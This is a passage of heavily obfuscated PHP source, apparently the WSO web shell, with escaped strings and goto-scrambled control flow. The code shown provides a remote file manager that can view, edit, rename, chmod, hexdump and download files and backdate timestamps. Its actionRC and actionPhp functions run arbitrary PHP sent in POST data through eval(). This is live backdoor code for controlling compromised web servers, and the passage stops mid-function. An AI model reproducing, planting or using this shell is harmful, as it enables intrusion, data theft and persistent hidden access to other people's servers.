"\x22\x29\47\x3e\x4e\141\155\145\x3c\x2f\141\76\74\57\164\x68\x3e\x3c\x74\150\76\x3c\141\40\150\x72\x65\x66\x3d\x27\x23\47\40\157\156\143\154\151\143\153\x3d\47\x67\x28\x22\106\151\x6c\x65\x73\115\141\156\x22\54\156\165\x6c\154\54\x22\163\137\x73\151\172\145\x5f" .
($sort[1] ? 0 : 1) .
"\x22\x29\47\76\x53\151\x7a\x65\74\57\x61\76\x3c\x2f\x74\150\76\74\x74\150\76\x3c\141\x20\150\162\145\146\75\47\x23\x27\x20\157\x6e\143\x6c\x69\x63\153\75\x27\x67\50\42\x46\x69\154\145\x73\115\141\x6e\42\x2c\x6e\165\154\x6c\x2c\x22\x73\x5f\x6d\157\x64\x69\x66\171\137" .
($sort[1] ? 0 : 1) .
"\42\x29\47\x3e\115\157\x64\151\146\x79\74\x2f\141\x3e\74\x2f\164\150\76\74\x74\x68\76\x4f\167\x6e\145\x72\x2f\x47\162\157\x75\x70\74\x2f\164\x68\76\74\164\x68\76\74\x61\x20\x68\162\x65\146\75\x27\x23\47\40\x6f\156\143\x6c\x69\143\x6b\x3d\x27\147\50\42\106\151\154\145\163\x4d\141\x6e\x22\54\156\x75\154\154\x2c\x22\x73\x5f\160\145\x72\x6d\163\x5f" .
($sort[1] ? 0 : 1) .
"\x22\51\47\x3e\x50\145\162\x6d\x69\163\x73\x69\x6f\x6e\163\x3c\57\141\x3e\74\57\164\150\76\74\x74\150\x3e\101\143\x74\151\x6f\156\x73\74\x2f\164\x68\76\74\x2f\164\162\x3e";
goto lC5LC;
b9q_L:
echo "\x3c\x74\162\x3e\x3c\164\x64\40\143\x6f\154\x73\160\141\156\75\x37\76\xd\xa\11\x3c\x69\156\160\165\164\40\164\171\x70\145\75\150\x69\x64\x64\145\x6e\x20\156\x61\155\145\x3d\141\40\x76\141\154\x75\x65\75\47\106\151\x6c\145\x73\x4d\x61\x6e\x27\76\xd\xa\x9\x3c\151\156\160\x75\x74\x20\164\171\160\x65\x3d\150\151\144\144\145\x6e\x20\156\x61\155\145\x3d\x63\40\166\141\x6c\165\145\x3d\x27" .
htmlspecialchars($GLOBALS["\143\x77\x64"]) .
"\47\x3e\15\xa\11\74\151\156\160\x75\x74\x20\164\x79\x70\x65\x3d\150\151\144\x64\145\x6e\40\156\x61\x6d\x65\75\143\x68\141\x72\163\x65\x74\40\x76\x61\154\x75\x65\x3d\47" .
(isset($_POST["\143\x68\141\162\163\145\164"])
? $_POST["\x63\150\x61\162\x73\145\164"]
: "") .
"\x27\76\xd\xa\11\x3c\163\145\x6c\x65\x63\164\x20\x6e\141\155\x65\75\x27\160\x31\x27\76\x3c\157\160\x74\x69\x6f\x6e\x20\166\x61\154\x75\145\x3d\x27\x63\157\x70\171\47\x3e\x43\x6f\160\171\74\x2f\x6f\160\x74\x69\x6f\x6e\x3e\x3c\157\x70\x74\x69\157\156\x20\166\141\x6c\165\145\75\x27\155\157\166\x65\47\x3e\x4d\157\x76\x65\x3c\x2f\157\x70\x74\x69\157\x6e\x3e\x3c\157\160\x74\151\x6f\x6e\40\166\x61\x6c\165\145\75\47\x64\145\154\145\x74\145\x27\76\104\x65\154\x65\x74\145\x3c\x2f\x6f\x70\164\151\157\156\x3e";
goto la8rp;
MMpaa:
$sort = ["\x6e\141\x6d\x65", 1];
goto EoM5y;
bpziK:
wsoHeader();
goto ecDrl;
GTtN3:
echo "\74\157\x70\x74\x69\x6f\x6e\40\x76\x61\154\x75\145\75\47\x74\x61\x72\47\76\103\157\155\160\162\145\x73\163\40\x28\x74\141\162\x2e\147\172\x29\x3c\x2f\157\160\x74\151\157\x6e\x3e";
goto qCBL1;
zga6H:
if (
!empty($_COOKIE["\x61\143\x74"]) &&
@count($_COOKIE["\x66"]) &&
($_COOKIE["\x61\143\x74"] == "\x7a\151\x70" ||
$_COOKIE["\141\x63\164"] == "\164\141\x72")
) {
echo "\x66\x69\154\145\40\156\x61\155\145\x3a\40\x3c\x69\x6e\x70\x75\164\40\164\x79\x70\145\x3d\164\145\x78\x74\40\156\141\x6d\145\x3d\x70\x32\40\166\141\x6c\165\x65\75\x27\x77\x73\157\137" .
date("\131\155\144\137\x48\151\x73") .
"\56" .
($_COOKIE["\141\x63\x74"] == "\x7a\x69\160"
? "\172\151\160"
: "\164\141\162\56\147\x7a") .
"\47\x3e\46\x6e\x62\x73\x70\x3b";
}
goto T3WX2;
DufhY:
if ($dirContent === false) {
goto KJVLY;
PFKsl:
wsoFooter();
goto ZsRi7;
KJVLY:
echo "\x43\141\156\47\164\x20\157\160\x65\156\x20\x74\x68\x69\163\x20\146\157\x6c\x64\x65\x72\x21";
goto PFKsl;
ZsRi7:
return;
goto Uwcm2;
Uwcm2:
}
goto S7vm3;
T3WX2:
echo "\x3c\151\156\x70\x75\164\40\x74\171\160\145\x3d\x27\163\165\142\x6d\151\164\47\x20\166\141\x6c\165\145\75\x27\76\76\x27\x3e\74\57\164\144\x3e\x3c\57\x74\x72\x3e\x3c\57\146\x6f\162\155\76\x3c\57\164\141\142\x6c\145\76\74\x2f\x64\x69\x76\76";
goto LlrBb;
LlrBb:
wsoFooter();
goto JxN5l;
S7vm3:
global $sort;
goto MMpaa;
pBUl1:
usort($dirs, "\x77\163\x6f\103\155\x70");
goto zukJ7;
p625P:
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
"\x6e\141\x6d\x65" => $dirContent[$i],
"\x70\141\x74\150" => $GLOBALS["\143\167\144"] . $dirContent[$i],
"\x6d\x6f\144\151\146\171" => date(
"\131\55\x6d\55\144\40\110\x3a\151\72\163",
@filemtime($GLOBALS["\x63\167\x64"] . $dirContent[$i])
),
"\x70\145\162\x6d\163" => wsoPermsColor(
$GLOBALS["\143\x77\x64"] . $dirContent[$i]
),
"\x73\x69\172\x65" => @filesize(
$GLOBALS["\x63\x77\x64"] . $dirContent[$i]
),
"\x6f\167\156\x65\162" => $ow["\x6e\x61\155\x65"]
? $ow["\x6e\x61\x6d\x65"]
: @fileowner($dirContent[$i]),
"\x67\x72\157\165\160" => $gr["\x6e\x61\155\x65"]
? $gr["\x6e\141\155\x65"]
: @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS["\x63\x77\144"] . $dirContent[$i])) {
$files[] = array_merge($tmp, [
"\164\171\160\145" => "\146\151\x6c\x65",
]);
} elseif (@is_link($GLOBALS["\x63\167\x64"] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, [
"\164\x79\160\145" => "\154\x69\156\x6b",
"\154\x69\156\153" => readlink($tmp["\160\141\x74\x68"]),
]);
} elseif (
@is_dir($GLOBALS["\x63\167\144"] . $dirContent[$i]) &&
$dirContent[$i] != "\56"
) {
$dirs[] = array_merge($tmp, ["\164\171\x70\145" => "\144\x69\162"]);
}
}
goto flVXx;
qCBL1:
if (!empty($_COOKIE["\x61\143\164"]) && @count($_COOKIE["\146"])) {
echo "\74\157\160\x74\151\157\156\40\166\x61\154\165\x65\x3d\x27\x70\141\163\x74\x65\47\76\x50\141\163\x74\x65\x20\x2f\40\103\x6f\x6d\160\162\145\x73\x73\x3c\x2f\157\x70\x74\x69\x6f\x6e\76";
}
goto b42P7;
zukJ7:
$files = array_merge($dirs, $files);
goto ICFmG;
JxN5l:
}
goto KC9ar;
xB4MH:
function actionFilesTools()
{
goto BkWtk;
URhzm:
if (is_file($_POST["\160\61"])) {
$m = [
"\x56\x69\x65\167",
"\110\151\147\x68\x6c\151\147\150\164",
"\104\x6f\167\156\x6c\x6f\x61\x64",
"\110\145\170\144\165\x6d\x70",
"\105\144\151\164",
"\x43\150\x6d\157\x64",
"\x52\145\x6e\x61\x6d\x65",
"\x54\157\x75\143\150",
];
} else {
$m = [
"\103\x68\x6d\x6f\x64",
"\122\x65\x6e\x61\x6d\145",
"\124\x6f\x75\143\x68",
];
}
goto ehyTX;
gIv2Z:
echo "\x3c\57\144\151\166\76";
goto q1Rl0;
ehyTX:
foreach ($m as $v) {
echo "\74\141\x20\150\162\145\x66\x3d\x23\x20\157\156\143\x6c\x69\x63\x6b\x3d\42\147\50\x6e\x75\x6c\154\54\156\x75\x6c\x6c\x2c\x27" .
urlencode($_POST["\160\x31"]) .
"\47\x2c\x27" .
strtolower($v) .
"\47\x29\x22\x3e" .
(strtolower($v) == @$_POST["\160\62"]
? "\x3c\x62\76\x5b\x20" . $v . "\40\x5d\x3c\x2f\142\76"
: $v) .
"\74\57\x61\76\x20";
}
goto OeBNf;
FcH_v:
if (!$uid) {
$uid["\x6e\x61\155\x65"] = @fileowner($_POST["\x70\x31"]);
$gid["\156\x61\155\145"] = @filegroup($_POST["\160\x31"]);
} else {
$gid = @posix_getgrgid(@filegroup($_POST["\160\61"]));
}
goto XQqyZ;
tJhrh:
if (@$_POST["\x70\x32"] == "\x6d\x6b\146\151\x6c\145") {
if (!file_exists($_POST["\x70\61"])) {
$fp = @fopen($_POST["\x70\61"], "\167");
if ($fp) {
$_POST["\x70\x32"] = "\145\144\x69\164";
fclose($fp);
}
}
}
goto UpcWr;
hJxBN:
echo "\74\x68\x31\x3e\x46\151\x6c\145\x20\x74\x6f\x6f\154\x73\x3c\57\150\x31\x3e\x3c\144\x69\x76\40\143\154\x61\163\x73\x3d\x63\157\x6e\164\x65\156\x74\76";
goto LggyK;
jReNS:
if (empty($_POST["\x70\x32"])) {
$_POST["\x70\62"] = "\x76\x69\x65\167";
}
goto URhzm;
OeBNf:
echo "\x3c\x62\162\76\x3c\x62\162\x3e";
goto kfx86;
vLiGd:
echo "\x3c\163\x70\141\x6e\76\103\x72\x65\141\x74\x65\x20\164\x69\155\x65\x3a\74\57\163\160\x61\156\x3e\40" .
date(
"\x59\x2d\155\55\x64\40\x48\72\x69\x3a\x73",
filectime($_POST["\160\x31"])
) .
"\x20\74\x73\x70\141\x6e\x3e\101\143\x63\x65\x73\163\40\164\x69\155\x65\72\x3c\x2f\x73\x70\x61\156\76\40" .
date(
"\131\55\x6d\x2d\144\40\x48\72\151\x3a\163",
fileatime($_POST["\160\61"])
) .
"\40\74\163\160\x61\x6e\76\x4d\157\144\x69\146\171\x20\164\151\155\x65\72\x3c\57\163\160\x61\x6e\76\x20" .
date(
"\x59\x2d\x6d\x2d\144\40\110\72\x69\x3a\x73",
filemtime($_POST["\160\61"])
) .
"\74\x62\x72\x3e\74\142\162\x3e";
goto jReNS;
LggyK:
if (!file_exists(@$_POST["\x70\61"])) {
goto uyJNU;
C_fb1:
return;
goto fRIHs;
uyJNU:
echo "\106\x69\x6c\145\40\156\157\x74\40\145\170\x69\x73\x74\163";
goto aEu8k;
aEu8k:
wsoFooter();
goto C_fb1;
fRIHs:
}
goto RVSqZ;
BkWtk:
if (isset($_POST["\x70\x31"])) {
$_POST["\160\x31"] = urldecode($_POST["\x70\61"]);
}
goto nB0r7;
UpcWr:
wsoHeader();
goto hJxBN;
q1Rl0:
wsoFooter();
goto lZIie;
RVSqZ:
$uid = @posix_getpwuid(@fileowner($_POST["\x70\61"]));
goto FcH_v;
kfx86:
switch ($_POST["\160\62"]) {
case "\166\151\145\x77":
goto QAifq;
bn9Hw:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto bbBoN;
bbBoN:
echo "\74\57\x70\x72\145\x3e";
goto K9Wsy;
GqRN7:
$fp = @fopen($_POST["\x70\61"], "\x72");
goto bn9Hw;
K9Wsy:
break;
goto xBp1j;
QAifq:
echo "\74\160\162\145\40\143\x6c\x61\x73\x73\x3d\x6d\x6c\61\76";
goto GqRN7;
xBp1j:
case "\150\x69\147\x68\x6c\x69\147\x68\x74":
if (@is_readable($_POST["\160\x31"])) {
goto QC8Iq;
XU2TQ:
$code = @highlight_file($_POST["\160\61"], true);
goto MtAXT;
QC8Iq:
echo "\74\x64\151\x76\40\143\154\x61\x73\x73\75\155\x6c\61\x20\163\x74\x79\154\x65\x3d\42\142\x61\143\x6b\147\162\x6f\x75\156\144\x2d\x63\157\x6c\157\x72\72\40\x23\x65\x31\145\x31\x65\61\x3b\143\157\154\x6f\x72\72\x62\x6c\x61\x63\153\73\42\76";
goto XU2TQ;
MtAXT:
echo str_replace(
["\74\163\160\x61\x6e\x20", "\74\57\163\x70\141\156\76"],
[
"\x3c\x66\x6f\156\x74\x20",
"\x3c\x2f\146\x6f\x6e\x74\x3e",
],
$code
) . "\x3c\57\x64\x69\166\x3e";
goto nntLP;
nntLP:
}
break;
case "\x63\150\x6d\157\x64":
goto P8hG1;
LoNwV:
break;
goto AyuC5;
lmil1:
echo "\74\163\x63\x72\151\160\x74\x3e\x70\x33\137\75\x22\42\x3b\x3c\x2f\x73\x63\162\151\160\x74\76\74\146\157\162\x6d\40\157\x6e\163\165\142\x6d\x69\164\x3d\x22\x67\50\156\x75\154\154\54\x6e\165\154\154\54\47" .
urlencode($_POST["\160\61"]) .
"\x27\x2c\x6e\165\x6c\x6c\54\x74\150\151\163\56\143\x68\155\157\x64\56\166\x61\x6c\165\x65\51\x3b\162\145\164\x75\162\x6e\x20\x66\x61\154\163\x65\x3b\x22\76\74\x69\156\x70\165\x74\40\164\171\160\145\x3d\164\145\170\x74\40\x6e\141\x6d\145\75\143\150\155\157\x64\40\x76\x61\x6c\165\145\75\42" .
substr(sprintf("\x25\x6f", fileperms($_POST["\160\61"])), -4) .
"\x22\76\x3c\151\156\x70\x75\x74\40\x74\171\160\145\x3d\x73\165\142\x6d\x69\164\40\x76\x61\154\165\145\75\x22\x3e\76\42\x3e\x3c\57\146\x6f\x72\155\76";
goto LoNwV;
AAUh2:
clearstatcache();
goto lmil1;
P8hG1:
if (!empty($_POST["\x70\63"])) {
goto dVl9Y;
brcvZ:
for ($i = strlen($_POST["\160\63"]) - 1; $i >= 0; --$i) {
$perms +=
(int) $_POST["\x70\x33"][$i] *
pow(8, strlen($_POST["\x70\63"]) - $i - 1);
}
goto NKCFJ;
NKCFJ:
if (!@chmod($_POST["\160\61"], $perms)) {
echo "\103\x61\156\47\x74\40\163\x65\x74\40\x70\x65\162\x6d\151\x73\163\x69\x6f\x6e\163\41\x3c\142\x72\76\74\x73\x63\x72\x69\160\x74\x3e\x64\157\143\x75\155\145\x6e\x74\56\x6d\146\x2e\x70\x33\56\x76\x61\154\165\145\x3d\42\42\73\x3c\x2f\163\x63\162\x69\160\x74\76";
}
goto PY3E2;
dVl9Y:
$perms = 0;
goto brcvZ;
PY3E2:
}
goto AAUh2;
AyuC5:
case "\145\144\x69\164":
goto H2fMN;
jCDwf:
echo "\74\x2f\164\x65\170\164\x61\x72\145\141\76\74\151\x6e\160\x75\164\x20\164\171\x70\145\x3d\163\x75\x62\x6d\151\x74\40\x76\x61\154\x75\145\75\42\x3e\76\x22\76\x3c\57\146\x6f\x72\155\76";
goto Pjp_6;
l2f3k:
echo "\74\x66\x6f\x72\x6d\40\157\x6e\x73\x75\x62\x6d\x69\x74\x3d\x22\147\50\156\165\x6c\x6c\54\156\x75\154\x6c\x2c\47" .
urlencode($_POST["\160\61"]) .
"\x27\x2c\156\x75\x6c\154\x2c\x27\61\47\53\x74\x68\x69\x73\56\164\145\x78\164\56\x76\141\154\165\145\51\x3b\x72\145\x74\x75\162\x6e\x20\146\141\154\x73\x65\73\42\x3e\74\164\x65\170\164\x61\162\145\x61\x20\x6e\x61\x6d\145\x3d\x74\x65\x78\164\x20\x63\154\141\163\x73\x3d\x62\x69\x67\x61\162\145\141\76";
goto B2Klk;
YessQ:
if (!empty($_POST["\x70\63"])) {
goto rcwpk;
JCP0G:
$fp = @fopen($_POST["\160\x31"], "\167");
goto UIGX9;
UIGX9:
if ($fp) {
goto AyUGu;
ZpECv:
echo "\123\141\x76\145\144\41\x3c\x62\x72\76\x3c\x73\143\x72\x69\160\x74\x3e\x70\x33\137\x3d\42\x22\73\74\57\x73\143\x72\151\160\x74\x3e";
goto ukKwu;
zJt34:
@fclose($fp);
goto ZpECv;
AyUGu:
@fwrite($fp, $_POST["\160\x33"]);
goto zJt34;
ukKwu:
@touch($_POST["\x70\61"], $time, $time);
goto w_o1Q;
w_o1Q:
}
goto ccEmf;
yLb3a:
$_POST["\x70\x33"] = substr($_POST["\x70\63"], 1);
goto JCP0G;
rcwpk:
$time = @filemtime($_POST["\x70\61"]);
goto yLb3a;
ccEmf:
}
goto l2f3k;
H2fMN:
if (!is_writable($_POST["\160\x31"])) {
echo "\106\151\154\x65\x20\151\163\156\x27\x74\x20\167\x72\x69\164\x65\x61\142\154\145";
break;
}
goto YessQ;
B2Klk:
$fp = @fopen($_POST["\160\61"], "\162");
goto of9BR;
of9BR:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto jCDwf;
Pjp_6:
break;
goto Gznea;
Gznea:
case "\x68\145\170\144\165\x6d\160":
goto m3kPv;
AuUGX:
$h = ["\x30\60\60\x30\60\60\x30\60\x3c\142\x72\x3e", "", ""];
goto GyLAr;
qeOJi:
$n = 0;
goto AuUGX;
jL3k2:
echo "\74\164\x61\x62\x6c\x65\x20\143\x65\x6c\x6c\x73\160\x61\x63\151\x6e\x67\75\x31\x20\143\x65\154\x6c\160\141\x64\x64\151\156\x67\75\x35\x20\142\147\143\x6f\154\x6f\x72\x3d\43\62\x32\62\x32\62\x32\76\74\x74\162\76\x3c\x74\x64\40\x62\147\x63\x6f\x6c\157\162\x3d\43\x33\63\63\63\x33\63\x3e\74\x73\160\141\156\40\x73\164\x79\x6c\x65\75\x22\x66\157\x6e\164\55\167\145\x69\147\150\164\x3a\x20\156\157\x72\155\x61\154\73\x22\x3e\x3c\160\162\x65\x3e" .
$h[0] .
"\74\57\x70\x72\145\x3e\74\x2f\x73\x70\141\156\76\x3c\57\x74\144\76\x3c\164\x64\x20\142\x67\x63\x6f\154\x6f\162\75\43\x32\70\62\x38\x32\70\x3e\74\160\162\x65\x3e" .
$h[1] .
"\x3c\57\x70\x72\x65\x3e\74\x2f\164\x64\76\x3c\x74\x64\x20\142\x67\143\157\154\157\162\75\x23\x33\x33\63\x33\63\x33\x3e\x3c\160\x72\x65\76" .
htmlspecialchars($h[2]) .
"\74\x2f\160\x72\145\x3e\74\x2f\164\144\x3e\x3c\x2f\164\162\x3e\x3c\x2f\x74\141\x62\154\145\x3e";
goto Ufiap;
m3kPv:
$c = @file_get_contents($_POST["\160\x31"]);
goto qeOJi;
Lem2Z:
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf("\45\x30\x32\130", ord($c[$i])) . "\x20";
switch (ord($c[$i])) {
case 0:
$h[2] .= "\40";
break;
case 9:
$h[2] .= "\x20";
break;
case 10:
$h[2] .= "\40";
break;
case 13:
$h[2] .= "\40";
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
goto NPU7A;
NPU7A:
$n = 0;
goto LQkUO;
fObRZ:
$h[1] .= "\74\142\x72\x3e";
goto fMXko;
LQkUO:
if ($i + 1 < $len) {
$h[0] .=
sprintf("\45\x30\x38\x58", $i + 1) .
"\74\142\162\x3e";
}
goto fObRZ;
fMXko:
$h[2] .= "\12";
goto BJu_G;
BJu_G:
}
}
goto jL3k2;
GyLAr:
$len = strlen($c);
goto Lem2Z;
Ufiap:
break;
goto owLSP;
owLSP:
case "\x72\145\x6e\x61\155\x65":
goto DPp_y;
zaQju:
break;
goto Mf7Ir;
DPp_y:
if (!empty($_POST["\160\63"])) {
if (!@rename($_POST["\x70\61"], $_POST["\x70\x33"])) {
echo "\103\x61\x6e\x27\x74\40\x72\x65\x6e\x61\x6d\145\41\74\142\162\76";
} else {
die(
"\74\x73\143\x72\151\x70\164\x3e\147\50\x6e\x75\154\154\54\x6e\165\x6c\154\54\42" .
urlencode($_POST["\x70\x33"]) .
"\x22\54\x6e\165\x6c\154\54\42\x22\x29\x3c\x2f\x73\x63\x72\x69\160\164\x3e"
);
}
}
goto S0xqX;
S0xqX:
echo "\x3c\x66\x6f\162\x6d\40\157\156\163\x75\142\155\x69\x74\75\x22\147\x28\156\x75\x6c\x6c\54\156\165\154\x6c\x2c\47" .
urlencode($_POST["\x70\61"]) .
"\47\54\156\165\154\x6c\x2c\x74\150\x69\163\x2e\156\x61\155\145\56\166\141\x6c\x75\x65\x29\x3b\x72\145\x74\x75\x72\x6e\40\146\141\154\163\x65\x3b\42\x3e\x3c\151\x6e\160\165\x74\40\x74\x79\x70\145\x3d\164\145\170\164\x20\x6e\141\155\x65\75\x6e\141\155\x65\40\x76\x61\x6c\x75\145\x3d\42" .
htmlspecialchars($_POST["\x70\x31"]) .
"\42\x3e\x3c\x69\156\x70\165\x74\x20\x74\171\160\145\75\163\165\142\x6d\x69\x74\40\166\x61\154\x75\x65\x3d\x22\76\x3e\x22\x3e\x3c\57\x66\x6f\x72\155\x3e";
goto zaQju;
Mf7Ir:
case "\164\x6f\165\x63\150":
goto MdNj9;
fcpc8:
echo "\74\x73\x63\162\151\160\x74\76\x70\x33\x5f\x3d\x22\42\73\x3c\57\x73\143\x72\151\x70\164\x3e\74\146\157\x72\155\x20\x6f\156\163\x75\x62\x6d\x69\164\75\x22\x67\x28\156\165\x6c\154\54\x6e\165\154\154\x2c\47" .
urlencode($_POST["\160\x31"]) .
"\47\x2c\156\x75\x6c\154\x2c\164\x68\x69\x73\56\164\157\x75\x63\150\56\x76\x61\x6c\165\145\51\73\x72\x65\x74\165\x72\x6e\40\146\141\x6c\163\145\73\42\x3e\74\151\156\x70\x75\x74\x20\x74\x79\x70\145\75\x74\145\x78\164\40\156\x61\x6d\x65\x3d\x74\x6f\x75\143\150\x20\166\141\154\165\145\75\x22" .
date(
"\x59\x2d\155\55\144\40\110\x3a\x69\72\x73",
@filemtime($_POST["\160\x31"])
) .
"\42\x3e\74\x69\156\x70\165\164\x20\x74\x79\x70\145\75\163\165\x62\155\151\164\x20\166\x61\154\x75\145\75\42\76\76\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e";
goto vSHOq;
vSHOq:
break;
goto RapuR;
GWQpw:
clearstatcache();
goto fcpc8;
MdNj9:
if (!empty($_POST["\x70\x33"])) {
$time = strtotime($_POST["\160\x33"]);
if ($time) {
if (!touch($_POST["\160\x31"], $time, $time)) {
echo "\x46\x61\x69\x6c\x21";
} else {
echo "\x54\157\x75\x63\150\x65\144\x21";
}
} else {
echo "\x42\x61\144\40\x74\x69\x6d\145\40\146\157\162\x6d\x61\164\41";
}
}
goto GWQpw;
RapuR:
}
goto gIv2Z;
nB0r7:
if (@$_POST["\160\62"] == "\144\x6f\x77\x6e\x6c\x6f\x61\x64") {
if (@is_file($_POST["\160\x31"]) && @is_readable($_POST["\160\x31"])) {
goto kEAXk;
LrqUY:
$fp = @fopen($_POST["\x70\x31"], "\x72");
goto oCCHm;
rpfQA:
if (
function_exists(
"\155\151\155\x65\x5f\x63\x6f\156\x74\x65\x6e\164\x5f\164\171\160\x65"
)
) {
$type = @mime_content_type($_POST["\x70\x31"]);
header(
"\103\157\x6e\164\x65\156\164\55\124\171\x70\x65\x3a\40" .
$type
);
} else {
header(
"\x43\x6f\x6e\164\x65\156\164\55\x54\171\x70\x65\x3a\x20\x61\x70\160\x6c\x69\x63\x61\164\151\157\156\x2f\157\x63\164\145\x74\x2d\163\164\162\145\141\155"
);
}
goto LrqUY;
oCCHm:
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
goto Vqm3n;
PiFXF:
header(
"\x43\x6f\x6e\x74\145\x6e\x74\55\104\151\x73\x70\x6f\163\151\164\151\157\156\72\x20\x61\164\x74\x61\143\x68\155\x65\156\164\73\40\x66\x69\x6c\x65\x6e\141\x6d\145\x3d" .
basename($_POST["\x70\61"])
);
goto rpfQA;
kEAXk:
ob_start("\157\x62\137\x67\x7a\x68\x61\156\x64\x6c\145\162", 4096);
goto PiFXF;
Vqm3n:
}
exit();
}
goto tJhrh;
XQqyZ:
echo "\x3c\x73\160\141\156\76\116\141\155\x65\72\x3c\x2f\x73\160\141\156\76\40" .
htmlspecialchars(@basename($_POST["\160\x31"])) .
"\40\x3c\163\x70\141\156\x3e\123\x69\172\145\72\x3c\57\x73\x70\x61\156\76\40" .
(is_file($_POST["\160\61"])
? wsoViewSize(filesize($_POST["\160\x31"]))
: "\55") .
"\x20\74\163\x70\x61\x6e\76\x50\x65\162\155\151\x73\163\151\157\156\x3a\74\x2f\x73\x70\x61\156\x3e\x20" .
wsoPermsColor($_POST["\160\61"]) .
"\40\x3c\x73\160\x61\156\76\117\x77\x6e\x65\x72\x2f\107\x72\157\165\160\72\74\57\x73\160\x61\156\76\40" .
$uid["\156\141\x6d\x65"] .
"\x2f" .
$gid["\x6e\x61\155\145"] .
"\74\x62\162\x3e";
goto vLiGd;
lZIie:
}
goto w2GF1;
etiAC:
function wsoPerms($p)
{
goto kfyb8;
GUcgT:
$i .=
$p & 0x1
? ($p & 0x200
? "\x74"
: "\170")
: ($p & 0x200
? "\124"
: "\55");
goto mshmE;
kfyb8:
if (($p & 0xc000) == 0xc000) {
$i = "\x73";
} elseif (($p & 0xa000) == 0xa000) {
$i = "\x6c";
} elseif (($p & 0x8000) == 0x8000) {
$i = "\x2d";
} elseif (($p & 0x6000) == 0x6000) {
$i = "\142";
} elseif (($p & 0x4000) == 0x4000) {
$i = "\x64";
} elseif (($p & 0x2000) == 0x2000) {
$i = "\143";
} elseif (($p & 0x1000) == 0x1000) {
$i = "\160";
} else {
$i = "\x75";
}
goto pqnZD;
GuUyD:
$i .= $p & 0x2 ? "\167" : "\x2d";
goto GUcgT;
Vg6sO:
$i .= $p & 0x10 ? "\167" : "\55";
goto vneDY;
I8J2d:
$i .=
$p & 0x40
? ($p & 0x800
? "\x73"
: "\170")
: ($p & 0x800
? "\x53"
: "\55");
goto yfJn7;
pqnZD:
$i .= $p & 0x100 ? "\162" : "\55";
goto FjLaa;
yfJn7:
$i .= $p & 0x20 ? "\x72" : "\x2d";
goto Vg6sO;
FjLaa:
$i .= $p & 0x80 ? "\x77" : "\55";
goto I8J2d;
vneDY:
$i .=
$p & 0x8
? ($p & 0x400
? "\x73"
: "\x78")
: ($p & 0x400
? "\123"
: "\55");
goto e6Pjl;
e6Pjl:
$i .= $p & 0x4 ? "\162" : "\x2d";
goto GuUyD;
mshmE:
return $i;
goto MofP7;
MofP7:
}
goto eRZM6;
j4eIF:
if (
!isset(
$_COOKIE[
md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\124"]) .
"\x61\152\141\170"
]
)
) {
$_COOKIE[
md5($_SERVER["\x48\x54\124\120\137\x48\117\x53\124"]) .
"\x61\x6a\141\170"
] = (bool) $default_use_ajax;
}
goto EoPoZ;
qZOco:
if (isset($_POST["\143"])) {
@chdir($_POST["\x63"]);
}
goto sO9OV;
tZUOM:
if (strtolower(substr(PHP_OS, 0, 3)) == "\167\x69\156") {
$os = "\167\x69\x6e";
} else {
$os = "\156\x69\170";
}
goto LqaMO;
B8b3D:
function actionRC()
{
if (!@$_POST["\160\x31"]) {
$a = [
"\165\x6e\x61\155\145" => php_uname(),
"\160\150\x70\x5f\x76\x65\162\x73\151\x6f\156" => phpversion(),
"\167\x73\157\137\166\145\x72\x73\x69\157\156" => WSO_VERSION,
"\163\x61\146\145\x6d\157\144\x65" => @ini_get(
"\x73\141\x66\x65\x5f\x6d\157\x64\145"
),
];
echo serialize($a);
} else {
eval($_POST["\160\61"]);
}
}
goto dPSqc;
Gop14:
$disable_functions = @ini_get(
"\x64\151\163\141\142\154\145\x5f\146\x75\156\x63\164\x69\x6f\156\163"
);
goto oE6Ue;
oHsYW:
function actionPhp()
{
goto s1VTJ;
ujMFQ:
wsoFooter();
goto dfcYP;
s1VTJ:
if (isset($_POST["\141\x6a\x61\x78"])) {
goto jtGxB;
XiIjv:
eval($_POST["\160\x31"]);
goto pcNS1;
cL7XN:
ob_start();
goto XiIjv;
keRr1:
exit();
goto cNits;
t7wh1:
echo strlen($temp), "\12", $temp;
goto keRr1;
pcNS1:
$temp =
"\x64\x6f\x63\165\155\x65\x6e\164\x2e\x67\145\164\105\x6c\x65\155\145\x6e\164\102\x79\x49\144\x28\x27\120\x68\x70\x4f\165\x74\x70\x75\x74\47\51\56\x73\x74\171\154\145\56\x64\x69\x73\x70\154\x61\171\x3d\47\x27\73\144\157\143\x75\155\x65\x6e\x74\x2e\x67\145\x74\105\x6c\x65\x6d\x65\156\164\x42\171\x49\x64\x28\47\x50\x68\160\117\x75\164\x70\165\164\47\x29\x2e\x69\156\156\145\162\x48\x54\x4d\114\75\x27" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"\xa\15\11\134\x27\x0"
) .
"\x27\73\xa";
goto t7wh1;
jtGxB:
WSOsetcookie(
md5($_SERVER["\110\x54\124\120\x5f\110\117\123\x54"]) .
"\x61\x6a\141\x78",
true
);
goto cL7XN;
cNits:
}
goto IyHRn;
wcs04:
echo "\74\57\160\x72\x65\76\x3c\57\x64\151\x76\76";
goto ujMFQ;
Sz7n2:
